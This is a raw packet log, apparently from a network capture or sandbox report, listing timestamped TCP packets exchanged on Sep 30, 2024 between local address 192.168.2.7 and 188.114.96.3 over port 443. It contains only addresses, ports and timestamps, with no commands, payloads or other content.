Sep 30, 2024 18:19:09.601171970 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.601178885 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.658188105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.658219099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.687953949 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688024044 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688059092 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.688076973 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688119888 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.688128948 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688431025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688442945 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688493013 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.688500881 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688906908 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688952923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688962936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.688970089 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.688993931 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.689485073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.689543962 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.689554930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.689600945 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.689834118 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.689887047 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.689893961 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.689908028 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.689946890 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.691678047 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.691756010 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.691884995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.691932917 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.692509890 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.692563057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.692591906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.692645073 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.692667007 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.692719936 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.692753077 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.692810059 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.693274021 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.693327904 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.693484068 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.693532944 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.778207064 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.778294086 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.778348923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.778400898 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.778856039 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.778907061 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.779156923 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.779202938 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.779844999 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.779894114 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.780013084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.780064106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.780963898 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.781009912 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.781018972 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.781085014 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.781562090 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.781616926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.782169104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.782202959 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.782226086 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.782232046 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.782258034 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.783104897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.783143997 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.783159971 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.783168077 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.783193111 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.783196926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.783237934 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.783242941 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.783289909 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.784060001 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.784097910 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.784116983 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.784122944 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.784151077 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.784166098 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.785263062 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.785312891 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.785450935 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.785501003 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.786000967 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786056042 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.786181927 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786226034 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.786231995 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786277056 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.786900043 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786927938 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786950111 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.786956072 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.786981106 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.787692070 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.787719965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.787740946 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.787746906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.787765026 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.788583994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.788636923 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.788645029 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.788687944 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.869160891 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.869213104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.869266033 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.869276047 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.869309902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.870276928 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.870295048 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.870364904 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.870374918 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.872060061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.872077942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.872144938 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.872157097 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.873940945 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.873955965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.874011040 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.874018908 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.875657082 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.875673056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.875732899 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.875742912 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.876355886 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.876370907 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.876429081 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.876439095 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.878091097 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.878104925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.878161907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.878170967 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.878216982 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.879076958 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.879091978 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.879132986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.879139900 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.879168987 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.921195984 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.959834099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.959856033 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.959928036 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.959935904 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.959980011 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.960688114 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.960705042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.960777998 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.960786104 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.960832119 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.962567091 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.962583065 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.962660074 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.962667942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.962712049 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.963596106 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.963610888 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.963680983 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.963694096 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.963737965 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.964576960 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.964597940 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.964658022 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.964664936 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.964719057 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.966526985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.966542959 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.966614962 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.966622114 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.966671944 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.967349052 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.967365026 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.967437983 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:09.967444897 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:09.967490911 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.000896931 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.000921011 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.000987053 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.001002073 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.001053095 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.051393032 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.051415920 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.051558018 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.051568031 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.051619053 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.052429914 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.052445889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.052505016 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.052511930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.052562952 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.053451061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.053473949 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.053530931 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.053539038 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.053580999 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.054732084 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.054747105 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.054815054 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.054821014 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.054869890 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.055707932 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.055752039 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.055783987 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.055792093 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.055824041 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.055846930 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.056659937 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.056679010 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.056741953 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.056750059 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.056792974 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.057636023 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.057673931 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.057704926 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.057712078 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.057742119 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.057761908 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.059269905 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.059288025 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.059355021 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.059362888 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.059422016 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.141705036 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.141727924 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.141863108 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.141875982 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.141942978 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.142852068 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.142868042 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.142944098 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.142951965 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.142992020 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.144211054 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.144227982 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.144285917 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.144294977 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.144334078 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.144953012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.144968987 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.145025015 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.145034075 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.145068884 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.145884991 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.145899057 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.145951986 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.145961046 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.145999908 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.146804094 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.146821022 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.146879911 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.146889925 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.146936893 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.148602962 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.148623943 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.148683071 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.148689985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.148732901 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.149449110 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.149473906 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.149509907 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.149519920 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.149543047 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.149558067 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.232362986 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.232387066 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.232510090 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.232522964 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.232572079 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.233000994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.233016968 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.233073950 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.233082056 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.233119965 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.234011889 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.234028101 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.234097958 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.234105110 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.234133959 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.234889030 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.234904051 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.234968901 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.234976053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.235003948 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.235018969 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.235744953 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.235759974 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.235825062 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.235832930 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.235876083 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.236510992 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.236526012 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.236584902 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.236593008 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.236639023 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.237339973 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.237354994 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.237410069 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.237420082 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.237446070 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.237462997 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.238504887 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.238521099 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.238595963 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.238603115 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.238643885 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.322995901 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323025942 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323146105 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.323178053 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323230028 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.323591948 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323607922 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323671103 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.323678970 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.323723078 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.324413061 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.324433088 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.324491024 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.324498892 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.324542046 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.325284958 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.325299978 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.325357914 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.325367928 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.325402975 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.326287985 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.326303005 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.326361895 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.326370955 CEST	443	49701	188.114.96.3	192.168.2.7
Sep 30, 2024 18:19:10.326421022 CEST	49701	443	192.168.2.7	188.114.96.3
Sep 30, 2024 18:19:10.326869011 CEST	443	49701	188.114.96.3	192.168.2.7
